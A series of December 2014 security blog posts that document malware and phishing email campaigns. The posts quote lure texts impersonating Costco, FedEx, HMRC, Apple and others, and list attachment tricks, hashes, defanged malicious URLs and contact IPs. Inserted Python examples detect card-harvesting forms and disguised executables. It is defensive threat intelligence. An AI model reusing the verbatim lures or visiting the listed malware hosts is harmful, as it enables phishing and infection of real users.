Wednesday, 31 December 2014

Costco Acceptance of Order malware

Costco Acceptance of Order malware has just arrived in time for the New Year...

Headers:
From: Costco
Reply-To: Costco
Subject: Acceptance of Order
Message body:
Our online store Costco.com received an order and the personal data of the recipient coincide with yours.

You may get your order in the nearest Local Store.

Attention! Your order can be reserved within 4 days.

You may see order details here.

Truly yours,
Costco.com


Clicking on the link with a Windows system gives you a zip file (name based on IP address location):

Costco_OrderID-110143-Nantwich.zip

Clicking on the link with a non-Windows system... yes, Windows 9x...




On the Windows machine, inside the zip, is a Windows executable:
Costco_OrderID-110143-Nantwich.exe


VirusScanner Reports:
Md5 Hash: 01bfae48c34156b7a9aa4c01d6988110
VirusTotal Report : [ 8 / 55] (a variant of Win32/Kryptik.CULP)
Malwr Report
Hybrid-Analysis Report
Cheers,

Steve
Sanesecurity.com

Tuesday, 30 December 2014

new job - money making scam

I've got a job....up to $5000 per month :O

Message:
Good day!

We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

We cooperate with different countries and currently we have many clients in the world.
Part-time and full-time employment are both currently important.
We offer a flat wage from $1500 up to $5000 per month.

The job offers a good salary so, interested candidates please registration on the our site: www DOT thinkedmoney DOT com

Attention! Accept applications only on this and next week.

Respectively submitted
Personnel department

The domain name details:


   Domain Name: THINKEDMONEY.COM
   Registrar: BIZCN.COM, INC.
   Whois Server: whois.bizcn.com
   Referral URL: http://www.bizcn.com
   Name Server: NS1.AGERMAINVA.NET
   Name Server: NS2.AGERMAINVA.NET
   Updated Date: 29-dec-2014
   Creation Date: 29-dec-2014

   Registrant Name: Madeline Goode
   Organization: Madeline T. Goode
   Street: 4824 Pheasant Ridge Road
   City: Philadelphia
   State/Province: PA
   Postal Code: 19126
   Country: us
   Phone: +1.2155496172
   Phone Ext:
   Fax: +1.2155496172
   Fax Ext:
   Email: info@thinkedmoney.com
Or... maybe not.

Cheers,

Steve
Sanesecurity.com

HM Revenue & Customs - Kathy Donnelly - HMRC Tax Credit Office phishing

Here's a HMRC phishing email with a zip attachment....

Headers:
From: "HM Revenue & Customs"{online-service@HMRC.gov.uk}
Subject: Tax Refund Message!

Message:
Dear Applicant,

The contents of this email and any attachments are confidential and as
applicable, copyright in these is reserved to HM Revenue & Customs.
Unless expressly authorised by us, any further dissemination or
distribution of this email or its attachments is prohibited.

If you are not the intended recipient of this email, please reply to
inform us that you have received this email in error and then delete it
without retaining any copy.

I am sending this email to announce: After the last annual calculation of
your fiscal activity we have determined that you are eligible to receive a
tax refund of 244.79 GBP

You have attached the tax return form with the TAX REFUND NUMBER ID: 381716209,
complete the tax return form attached to this message.

After completing the form, please submit the form by clicking the SUBMIT
button on form and allow us 5-9 business days in order to process it.

Our head office address can be found on our web site at HM Revenue & Customs: http://www.hmrc.gov.uk

Sincerely,

 Kathy Donnelly,
 HMRC Tax Credit Office
 Preston
 TAX REFUND ID: UK681716209-HMRC

© Copyright 2014, HM Revenue & Customs UK All rights reserved.

The attachment is a zip file:
HM Revenue & Customs - HS380 Form.zip

Inside the zip file is a standard html file:
HM Revenue & Customs - HS380 Form.html

If you access the html file with a browser you get a fake HMRC form, asking for all your
payment credit/debit card details:




The data from this form is then posted to a fake form address (the action URL is omitted here):

<div class="portlet-body">
<form name="processForm" method="POST" onsubmit="return submitIt(this)">
Cheers,

Steve
Sanesecurity.com
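Added example (not code from the original post): a small Python check for HTML attachments like the HS380 form above. It collects each form's fields and submission target and flags forms that gather card details but post to a host outside the impersonated brand, over plain HTTP, or through a script handler such as the onsubmit="return submitIt(this)" seen in the sample. The HTML, the phish-host.invalid destination and the BRAND_HOSTS set are constructed for this example; the real form's action address is not shown on the page.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the lure claims to belong to (assumption for this example: the HMRC brand).
BRAND_HOSTS = {"hmrc.gov.uk"}
# Field-name fragments that indicate payment or login data is being collected.
SENSITIVE_HINTS = ("card", "cvv", "cvc", "expir", "pin", "sort", "account", "password", "dob")

# Constructed sample modelled on the HS380 form attachment; the host is a placeholder.
SAMPLE_HTML = """
<div class="portlet-body">
<form name="processForm" method="POST" action="http://phish-host.invalid/hs380/post.php"
      onsubmit="return submitIt(this)">
  <input name="full_name"> <input name="card_number"> <input name="expiry_date">
  <input name="cvv"> <input name="sort_code"> <input type="submit" value="SUBMIT">
</form>
</div>
<form name="search" method="GET" action="https://www.hmrc.gov.uk/search">
  <input name="q">
</form>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method, onsubmit handler and field names."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"name": a.get("name") or a.get("id", ""),
                             "action": a.get("action", ""),
                             "method": (a.get("method") or "get").upper(),
                             "onsubmit": a.get("onsubmit", ""),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            if name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_is_brand(host, brand_hosts):
    """True when host is one of the brand hosts or a subdomain of one."""
    return any(host == b or host.endswith("." + b) for b in brand_hosts)


def assess_form(form, brand_hosts=BRAND_HOSTS):
    """Return reasons a form looks like a card/credential harvester (empty list if benign)."""
    sensitive = [f for f in form["fields"] if any(h in f for h in SENSITIVE_HINTS)]
    if not sensitive:
        return []
    reasons = []
    url = urlparse(form["action"])
    host = (url.hostname or "").lower()
    if not host:
        reasons.append("sensitive fields with relative/empty action (destination hidden in script)")
    elif not host_is_brand(host, brand_hosts):
        reasons.append(f"sensitive fields posted to non-brand host {host}")
    if url.scheme == "http":
        reasons.append("submission over plaintext http")
    if form["onsubmit"]:
        reasons.append(f"submission intercepted by script handler '{form['onsubmit']}'")
    return reasons


def analyse_html(html, brand_hosts=BRAND_HOSTS):
    """Map each form name to its findings; forms with no findings are omitted."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    findings = {}
    for form in parser.forms:
        reasons = assess_form(form, brand_hosts)
        if reasons:
            findings[form["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in analyse_html(SAMPLE_HTML).items():
        print(name, "->", "; ".join(reasons))
```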

Apple Account phishing

Overnight there's been a big Apple phishing push, no doubt timed for Apple based Christmas presents
that people have received.

Lots of different From addresses and Subjects.

Sample Message headers:
From: "Apple Org" {support@apple.cm}
Subject: Account temporarily suspended - action required

From: "AppleID Support" {support@apple.cm}
Subject: Your Apple account requires verification

From: "Your Apple support" {zonaprieta@moldran.com}
Subject: Account information expired

From: "Apple Co" {skearney@packeteer.com}
Subject: Account deactivated - action required

From: "Apple Org" {support@apple.cm}
Subject: Account information update required

From: "Apple support" {mclean@libtrade.com}
Subject: Your account information needs to be updated

From: "AppleID Support" {angie.gonzalez@investrmi.com}
Subject: Billing information update required

From: "Apple Ltd" {support@apple.cm}
Subject: Please update your account details

From: "Apple Co" {webmaster@sbcglobal.net}
Subject: Please confirm your billing details

From: "AppleID Support" {support@apple.cm}
Subject: Apple account verification required

From: "Your Apple support" {support@apple.cm}
Subject: Please update your account details

From: "Your Apple support" {support@apple.cm}
Subject: Billing information expired

From: "Apple Org" {enji_murata@jedstock.com}
Subject: Billing information update required

From: "Your Apple support" {support@apple.cm}
Subject: Account verification failed

From: "Apple SarL" {support@apple.cm}
Subject: Please confirm your account details

Sample Message body:
Dear customer,
It has come to our attention that the Billing Information associated with your account are out of date. To maintain account safety and to ensure that the account is in the right hands it is required for you to update your Billing information.
Failure to update your records within 7 days will result in account termination.
Click on the reference link below and update your billing information on the following page to complete account verification:
Thanks,
Apple Customer Support

The "reference link" above does not go to the Apple site; instead it takes you to a fake phishing site:
h t t p://authorize-icloud DOT com/uk/index.html
The fake phishing site above looks like this:

Cheers,

Steve
Sanesecurity.com

Monday, 29 December 2014

imagen - Enviado desde mi iPhone malware

Small malware run just coming in....

Message:
Subject:  imagen
From: n-spragg@yahoo.es
Date: Mon, December 29, 2014 12:32 pm
-
Enviado desde mi iPhone
-

Attachment:


img-3633691.jpeg.zip



Inside Zip file:


img-0980001.jpeg.exe



Note the double-extension attachment: it tries to display as a picture file,
but is actually an exe file.


Scanner Reports:


VirusTotal: f4ce3ede3f8c1f8afd1646cc2d700621 [7/56 scanners]
Hybrid-Analysis
Malwr Report
Cheers,

Steve
Sanesecurity.com
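Added example (not the original post's own code): a Python triage routine a mail gateway could run over a zip attachment, covering the naming tricks seen in this and the other posts on this page: double extensions such as .jpeg.exe, _pdf.scr stems, a .pif inside a folder, and a PE file hiding under a harmless extension. The archive and its MZ stub are constructed inline; no real sample is used.

```python
import io
import zipfile

# Extensions Windows runs as programs (.exe, .scr and .pif all appear in the runs above).
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# Extensions the lure claims the attachment is (picture, document, voice mail).
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".jpeg", ".jpg", ".png", ".wav", ".txt"}


def split_name(member):
    """'dir/img-0980001.jpeg.exe' -> ('img-0980001', ['.jpeg', '.exe'])."""
    base = member.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return parts[0], ["." + p for p in parts[1:]]


def classify_member(member, head):
    """Return the reasons a zip member is suspicious; head is its first bytes."""
    reasons = []
    stem, exts = split_name(member)
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {last}")
        # img-0980001.jpeg.exe style: a decoy extension sitting in front of the real one
        if any(e in DECOY_EXTS for e in exts[:-1]):
            reasons.append("double extension with a picture/document decoy")
        # IM0743436407_pdf.scr / fax8642174_pdf.exe style: the decoy type is in the stem
        if any(stem.endswith("_" + e[1:]) for e in DECOY_EXTS):
            reasons.append("decoy type spelled in the file stem")
    if head.startswith(b"MZ"):
        reasons.append("MZ header: a Windows PE file whatever the extension")
    return reasons


def scan_zip(data, max_members=100):
    """Return {member: reasons} for the suspicious members of an in-memory zip."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist()[:max_members]:
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic is read, so a zip bomb cannot hurt here
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def should_quarantine(data):
    """Gateway verdict: hold any archive that carries a suspicious member."""
    return bool(scan_zip(data))


def build_sample_archive():
    """Constructed test archive (not a real sample): a stub carrying only the DOS 'MZ' magic."""
    fake_pe = b"MZ" + b"\x00" * 62
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("img-0980001.jpeg.exe", fake_pe)                      # picture decoy, double extension
        zf.writestr("IM0743436407_pdf.scr", fake_pe)                      # 'pdf' spelled in the stem
        zf.writestr("2x40ft containers/2x40ft containers.pif", fake_pe)   # .pif inside a folder
        zf.writestr("renamed.txt", fake_pe)                               # PE hidden under a benign extension
        zf.writestr("invoice.pdf", b"%PDF-1.4 benign text")              # genuine-looking document
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_archive()).items():
        print(member, "->", "; ".join(reasons))
```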

dating spam: Hi my friend! - My name is Elena

At the moment, the emailed malware seems to have dried up... but instead we're seeing lots of
holiday dating spam emails, like this example (the email address is pretty random):

Hello!!!

My name is Elena.
I looked yours profil and have become interested in you.
I live in Russia in city Cheboksary.
If you have become interested in me.

Write to me at once on mine e-mail: zinfira.klikina@yandex.ru

I shall tell to you more about myself also I shall send you my photos.
I wait for yours the letter and a photo.

Elena.

Here's another example:

Good time of the day!
I am very sensitive, kind, tender lady http://mow DOT so/RovIWQWM
My friends say i have genuine  sense of humor.
I hope for a real meeting with a man  who has serious
intentions and wants to create harmonious relationship.
I hope he will be kind, reliable, loving man and caring
person.
Goodbye
Alexandry


Cheers,

Steve
Sanesecurity.com

Friday, 26 December 2014

Emma Jones - sakaitrading: rtf document and rar malware (+1412718912)

A single email arrived today, with a couple of interesting attachments...

From: "Sakai Trading Inc" e.jones@sakaitrading.com
Date: Fri, 26 Dec 2014 04:40:27 +0000
Subject: Fw: 2x40ft containers New York Long Beach

Hello

Please find attached and quote for us your best price to New York Long Beach. We need to know the exact mass production time needed after paying the deposit payment and also the aprox delivery time to New York Long Beach by sea. What are your payment terms? Can you accept LC at sight or cash against document payment?
Also we need to know if we can visit your place after new year so we can take a look on the production process there.

Thank you
Regards
Emma Jones
Sakai Trading Company Inc
3300 Polo Place, Bronx, New York, 10453, USA
Tel: +1412718912
Fax: +4127118910


Attached to the above email are two files...

2x40ft containers New York Long Beach USA.doc and 2x40ft containers New York Long Beach USA.rar.

2x40ft containers New York Long Beach USA.rar contains a .pif executable, in a folder:

2x40ft containers New York Long Beach USA\2x40ft containers New York Long Beach USA.pif

It is reported on VirusTotal as:

[Hash: fc6d66e5bf18b5f55aa847f08a32a25] (3/56) and contains Trojan[Backdoor]/Win32.Androm
Malwr Report [here]

The 2x40ft containers New York Long Beach USA.doc file, is reported on VirusTotal as:

[Hash: aa76b4d979ebf24437a4335a11dba98] (13/56) and contains Exploit.RTF.CVE-2012-0158
Malwr Report [here] shows that it steals information from browsers
 
Cheers,

Steve
Sanesecurity.com

Wednesday, 24 December 2014

Postal Notification Service Fedex malware

New FedEx malware incoming...

From:     "Fedex" personificationztx986@newmasternetgroup.com
Subject: Postal Notification Service

Dear Customer,

  Your parcel has arrived at December 12. Courier was unable to deliver the parcel to you.
  To receive your parcel, print this label and go to the nearest office.


The link inside the email is a direct link to download a piece of malware...

minager DOT com/notification DOT exe

Malwr report here: [Malwr]

VirusTotal Report here [7bd2d408c56d9cc0a23806b4a24997ee]

Cheers,

Steve
Sanesecurity.com

Rhianna Wellings teckentrupdepot.co.uk Signature Invoice 44281 word document malware

More macro based malware this time from Rhianna Wellings of teckentrupdepot, whose
name and company name are being used to make the malware look a bit more genuine:

From: Rhianna Wellings Rhianna@teckentrupdepot.co.uk
Subject: Signature Invoice 44281
Date: Wed, 24 Dec 2014 11:56:30 +0300
 

Your report is attached in DOC format.

To load the report, you will need the Microsoft Word reader, available to download at http://www.microsoft.com
 

The attachment is Signature Invoice.doc

Two variants so far... with VirusTotal reporting no scanners picking it up:

38368ef451cbe4120f427e4b79405c6c
7de7706ab70a440069ef17c2b8656919

Sanesecurity are detecting this as:

Sanesecurity.Malware.24646.DocHeur (phish.ndb)
Sanesecurity.RogueDoc.0hr.20141224-0904 (rogue.hdb)

Decoded macro here: (pastebin)

Latest Malwr Report here: (Malwr)

teckentrupdepot.co.uk have put a note about the issue and updated their website:

Important Information
We are currently experiencing an IT issue where one of our email addresses has been spoofed. If you have received an email with a suspicious attachment then please delete it. You need do nothing further as we have identified the machine which is outside of our organisation and are working with them to remedy the problem. Sorry for any inconvenience.




NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a Windows executable and so will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking automatic screenshots or copying information from your clipboard (copy/paste)).


Cheers,

Steve
Sanesecurity.com

Tuesday, 23 December 2014

Dawn Early ADP Invoice malware

 A zipped malware run has just started...


From: "Dawn.Early@adp.com" Dawn.Early@adp.com
Date: Thu, 24 Jul 2014 09:38:34 GMT
Subject: ADP Invoice for week ending 12/21/2014


Your most recent ADP invoice is attached for your review.

If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.

Thank you for choosing ADP for your business solutions.

Important: Please do not respond to this message. It comes from an unattended mailbox.


The attachment in this example is invoice_41298491.zip, which actually has an executable called
invoice_41298491.scr inside it.

MD5 hash and VirusTotal Report: [9c325ce702a2ed871bab947b828f6ae5]

The Anubis report can be found here [Anubis]


Cheers,

Steve
Sanesecurity.com

You have received a voice mail: malware

More incoming malware...

You received a voice mail : VOICE459-973-9894.wav (27 KB)
Caller-Id: 459-973-9894
Message-Id: 8V7XOJ

This e-mail contains a voice message.   

Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

The attachment is supposed to be a voice mail (wav file), but instead the zip contains a .SCR
executable file:

Voice347-237-2718.scr

Current md5 hash and VirusTotal report [1/56]:

5c37a7a69b739f45607dd3106163034f

 Currently being blocked by:

Sanesecurity.Rogue.0hr.20141223-1148

Cheers,

Steve
Sanesecurity.com

Remittance Advice (malware excel attachment)

Another incoming excel attachment with macro...

From: "Hood"  (random from address)
Subject: Remittance Advice -FHAX74
(random reference)


Confidentiality and Disclaimer:  This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error.  



This email and any attached files have been scanned for the presence of computer viruses. However, you are advised that you open any attachments at your own risk.
Please note that electronic mail may be monitored in accordance with the Telecommunications (Lawful Business Practices)(Interception of Communications) Regulations 2000.



The attachment, for example FHAX74.xls, contains macro code to download extra malware onto
your system. The attachment filename is random.

Md5 hashes so far and report clean from VirusTotal:

013c90d7a07e365e82fd8ed0103efbe9
378a36d9d110251717de6061411f6714

Decoded macro here: (pastebin)

Sanesecurity signatures are blocking this one as:

Sanesecurity.Malware.24675.XlsHeur.UNOFFICIAL FOUND

Just to show you the sort of numbers involved in these virus runs... per hour... that one site is
receiving...





NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a Windows executable and so will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking automatic screenshots or copying information from your clipboard (copy/paste)).


Cheers,
Steve
Sanesecurity.com

CHRISTMAS OFFERS: Jayne route2fitness.co.uk: (attached word malware)

Looks like some new word macro malware is incoming...
with no message body.... but does have an attached file:

From: "Jayne" Jayne@route2fitness.co.uk
Subject: CHRISTMAS OFFERS.docx


Currently the attached filename is: CHRISTMAS OFFERS.doc

As suspected it's a word macro malware.

Sanesecurity signatures are blocking this one as:

Sanesecurity.Malware.24646.DocHeur.UNOFFICIAL FOUND

Hashes so far... and ALL VirusTotal scanners are showing clean :(

76990032cc123694595913f1cc799e0e
9d0b2db07a5c5a903e0d599c8fcc63ca

Decoded macro here: (pastebin)

Route 2 Fitness is a Sports Club and won't have anything to do with the malware,
they are just being used as a target :(

Just to show you the sort of numbers involved in these virus runs... per hour... that one site is
receiving...




NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a Windows executable and so will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking automatic screenshots or copying information from your clipboard (copy/paste)).



Cheers,

Steve
Sanesecurity.com

Monday, 22 December 2014

word document malware: AquAid card receipt: "Tracey Smith"

Once again AquAid have been targeted for today's malware run of a macro-infected
Word document...

Example...

From: "Tracey Smith"
Subject: Card Receipt
Date: Mon, 22 Dec 2014 12:56:58 +0400




Hi

Please find attached receipt of payment made to us today

Regards

Tracey




Tracey Smith| Branch Administrator

AquAid | Birmingham & Midlands Central

Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP

Telephone:        0121 525 4533

Fax:                  0121 525 3502

Mobile:              07795328895

Email:               tracey.smith@aquaid.co.uk


AquAid really is the only drinks supplier you will ever need with our huge product range. With products ranging from bottled and mains fed coolers ranging up to coffee machines and bespoke individual one off units we truly have the right solution for all environments. We offer a refreshing ethical approach to drinks supply in that we support both Christian Aid and Pump Aid with a donation from all sales.  All this is done while still offering a highly focused local service and competitive pricing. A personalised sponsorship certificate is available for all clients showing how you are helping and we offer £25 for any referral that leads to business.

*********************************************************************
AquAid Franchising Ltd is a company registered in England and Wales with registered number 3505477 and registered office at 51 Newnham Road, Cambridge, CB3 9EY, UK. This message is intended only for use by the named addressee and may contain privileged and/or confidential information. If you are not the named addressee you should not disseminate, copy or take any action in reliance on it. If you have received this message in error please notify the sender and delete the message and any attachments accompanying it immediately. Neither AquAid nor any of its Affiliates accepts liability for any corruption, interception, amendment, tampering or viruses occurring to this message in transit or for any message sent by its employees which is not in compliance with AquAid corporate policy.


At the moment these are the md5 hashes... with VirusTotal results shown:

7f023b169da30a68c45080b81e6841a3
c696a8312557f2754bc4d3ddf63ff38f
ed176c4c7a5b5d13928b15f09581d0fa

Decoded macro here: (Pastebin)



NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a Windows executable and so will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking automatic screenshots or copying information from your clipboard (copy/paste)).



Cheers,

Steve

Friday, 19 December 2014

Malware: Sage Invoice

Another Sage invoice, which is supposed to be a pdf...

Date: Fri, 19 Dec 2014 13:42:58 +0200
From: "Sage"
Subject: FW: Invoice_8822271 ~

Please see attached copy of the original invoice (sage_invoice_127139_982109.pdf)

sage_invoice_127139_982109.zip


Zip contains sage_invoice_127139_982109.scr (which is executable)


Submitting to VirusTotal:

Md5 hash: 77a103ddd3fcb414d9cd5fe8f353c87 [6/55]

Cheers,

Steve
Sanesecurity

Excel malware: BACS payment Ref

More macro malware... this time from "BACS"

Date: Fri, 19 Dec 2014 11:55:31 +0200
From: "Buck Bean" (Names and Addresses are random)
Subject: BACS payment Ref:026919ZL (Ref is random)
 

Please see below our payment confirmation for funds into your account on Tuesday re invoice 026919ZL

Attached is an excel file: 026919ZL.xls (filename is random)

Four variants  so far...

MD5 hash: 3b21e1fb5d4fb2d67bcfc716a57ad41c [0/56]
MD5 hash: 827803f959140b728d66adb4b209b619 [0/56]
MD5 hash: ba4ab13558df82e4b6c347828a130a06 [0/56]
MD5 hash: 0eed6374118743dcaf207df327d5fa07 [0/56]

Detection added:

Sanesecurity.Malware.24675.XlsHeur
Sanesecurity.Rogue.0hr.20141219-1104

The decoded macro is here: pastebin

Just a reminder about opening the document with other devices and Online VirusScanners:

Cheers,

Steve
Sanesecurity.com

Malware: Tiket alert FBR service

Just arriving...

From:     "FBR service"
Subject: Tiket alert

Look at the attached file for more information.

Assistant Vice President, FBR service
Management Corporation

The attached Zip file alert_info.zip actually contained an EXE file called:


my_ass_foto_2347329847893274823798.exe

Hmmm... I think a malware writer forgot to rename the file from the earlier run.. lol

hash: aeb39690df91438edcef14bc64ddd982

Cheers,

Steve
Sanesecurity.com

Malware: hola mi foto :)

An incoming email, containing a short message:

hola mi foto :)

... except it's got a Zip attachment, called my.zip.

Inside the above Zip, is a randomly named exe file...

my_ass_foto_2347329847893274823798.exe

Fire it off to VirusTotal and well, it's scoring 0/54 at the moment..

Hash:  aeb39690df91438edcef14bc64ddd982

Cheers,

Steve
Sanesecurity.com 

malware: fake FedEx Priority Overnight email

I've seen fake FedEx emails before...

Subject: Delivery Status Notification
From: "FedEx Priority Overnight"
 
  FedEx
 
  Dear Customer,
 
  Your parcel has arrived at December 12. Courier was unable to deliver the parcel to you.
  To receive your parcel, print this label and go to the nearest office.

  Get Shipment Label
 
  FedEx 1995-2014


Screen grab...



If you "hover" the mouse over the "Get Shipment Label":

 


Hmmm... doesn't seem legit at all... and you're correct it's not.

What is interesting is that if you click on the link, the downloaded file is named Label-, followed
by your IP location details...

eg.

Label-Winsford-CW7.zip

Inside the above zip is: Label-Winsford-CW7.exe

All of which is designed to make the email seem legit, as they have your Location and Postcode !

A typical Get your Location details from your IP address/Browser can be found here:  https://freegeoip.net/


I've run the file through Jotti and VirusTotal:

Hash: (94c5fb4c6c6fc1da555a909b63784e1) Jotti: [6/22]
Hash: (94c5fb4c6c6fc1da555a909b63784e1) VirusTotal: [10/56]


Generally, it seems to be: Win32/Kryptik.CTFL

Cheers,

Steve
Sanesecurity.com


Thursday, 18 December 2014

Windows: Online Virus Scanners

Hopefully most people should have some anti-virus software in place, but another Anti-Virus opinion is always a good thing to have, when dealing with current malware.

Here are three online virus scanners, which have proved to be good for me... but your mileage may vary:

Eset
Kaspersky
F-Secure

 Disclaimer: obviously use the above scanners at your own risk etc.


malware: rbs account incident

More incoming nasties...

From: "Les Caron" (and other "random names/addresses)
Subject: RE: Incident IM02023830 (random reference)

Good Afternoon ,

Attached are more details regarding your account incident.

Please extract the attached content and check the details.

Please be advised we have raised this as a high priority incident and will endeavour to resolve it as soon as possible. The incident reference for this is IM02023830.


We would let you know once this issue has been resolved, but with any further questions or issues, please let me know.

Kind Regards,

Les Caron

Level 2 Adviser | Customer Experience Team, IB Service & Operations 7th Floor, 1
Hardman Boulevard | Manchester | M3 3AQ | Depot code: 049
Tel: 0845 300 4108 |Email: Les.Caron@rbs.co.uk The content of this e-mail is CONFIDENTIAL unless stated otherwise


Inside the zipped attachment is:


IM0743436407_pdf.scr

Again: it's NOT a pdf file but an executable screen saver file.

Submitting the file (hash: 9513595daf2c327d1be65f79aaafb70f) to VirusTotal gives us
a hit rate of [5/56]

Cheers,

Steve
Sanesecurity.com

malware: Myfax Internet Fax Job

Just received a "Myfax fax" for a new job....
 
Date: Thu, 18 Dec 2014 12:27:41 +0000
From: "MyFax" 
Subject: Internet Fax Job

Fax image data
http:/ / neyeradvisors DOT com/documents/fax.html
 
 
If you click on the random(ish) link (don't btw) you'll get a zip file,
which contains: 
 
fax8642174_pdf.exe
 
Note: it's an executable file and NOT a pdf.
 
Submitting the file to VirusTotal gives us a report of:
 
bb188ef8590840b72e4fa762e7e99124 (2/56 scanners hit)
 
Needless to say, the only job you'll get from this is a PC clean :(
 
Detected as Sanesecurity.Malware.24672 (phish.ndb)
 
Cheers,
 
Steve
Sanesecurity.com 
  
 
 

word/excel macro malware: other devices

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro
embedded inside the attachment.

However, the auto-download file is normally a Windows executable and so will not currently run on these two operating systems.

If you are an Apple/Android user and forward the message to a Windows user, you will
then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking automatic screenshots or copying information from your clipboard (copy/paste)).

Cheers,

Steve
Sanesecurity.com

word document malware: AquAid receipt of payment

Just receiving  a whole load of these faked AquAid invoices containing an embedded macro:

From: "Tracey Smith"
Subject: Card Receipt
Date: Thu, 18 Dec 2014 09:26:42 +0200

Hi

Please find attached receipt of payment made to us today

Regards

Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP
Telephone:        0121 525 4533
Fax:                  0121 525 3502
Mobile:              07795328895
Email:               tracey.smith@aquaid.co.uk


Two variants at the moment... VirusTotal reports:

a881b1031959d5dae6352f31b6ba2df3 (2/56)
eb6db8890657f982118699f019812fdd (1/53)

Detection:

Sanesecurity.Malware.24670.DocHeur (phish.ndb)
Sanesecurity.Rogue.0hr.20141218-0835 (rogue.hdb)

The embedded macro can be seen here (pastebin)
Malwr report can be seen here (Malwr)

One sample tries to connect to two hosts:

74.208.11.204 (USA)
81.169.156.5 (Germany)

Cheers,

Steve
Sanesecurity.com

Example Stats of a Macro document malware run

Most people will get a few copies of a certain type of virus, and I thought it might be of interest to see an example of how many viruses a certain organisation may get.

The graph below shows a snapshot of Virus/Spam items caught by Sanesecurity signatures (top 5 only)
per hour, yes, per hour:

Sanesecurity_Malware_24646_DocHeur_UNOFFICIAL (which is a generic macro detection signature) blocked a maximum of 16,644  in ONE HOUR... that's a big bot net someone has control of.

What's also interesting to see is how long a typical malware run lasts for.

Cheers,

Steve
Sanesecurity.com

Wednesday, 17 December 2014

malware: Sage Invoice / Outdated Invoice

Date: Wed, 17 Dec 2014 13:06:41 +0200
From: "Sage Invoice" 
Subject: Outdated Invoice

Sage Account & Payroll

You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow  to view/download your account invoice:

http://northinc DOT com/yazbnartya/vbyygudryl.html 
 
 
The above random link, downloads document9213.zip, which contains document9213.scr.
 
Submitted this to VirusTotal:
 
(hash: e8f063aff9cec2a2e3edcf48b780801a) (3/53)
 
Detected as: Sanesecurity.Malware.24668 (phish.ndb)
 
Cheers,
 
Steve
Sanesecurity.com 

Excel Malware: PL REMITTANCE Integra Finance

Another macro based malware incoming, using Excel

From: "Frederic Nichols" 
Subject: PL REMITTANCE DETAILS ref825235IN

The attached remittance details the payment of £720.58 made on
16-DEC-2014 by BACSE.

This email was generated using PL Payment Remittance of Integra Finance System.

Can you please check that your supplier details are correct, if any
changes are required please email back to this email address quoting
your remittance reference.

825235IN.xls (random filename)

 
Four Variants (md5 hashes below)
 

12a329ec30a90b57ad5d65261a03038c
666a50998673aca9abc1b54be355a950
7c9e2b80062f7e5c7faa8a97ea134df1
80e98b1dbc5af0e40e4fa0b96e181c14
 

Detected as: 
 
Sanesecurity.Rogue.0hr.20141217-1001 (rogue.hdb)
Sanesecurity.Malware.24667.XlsHeur (phish.ndb)
 
Update: the live malware from one of the download locations, seems to
have been run by 96,120 people already :(
 
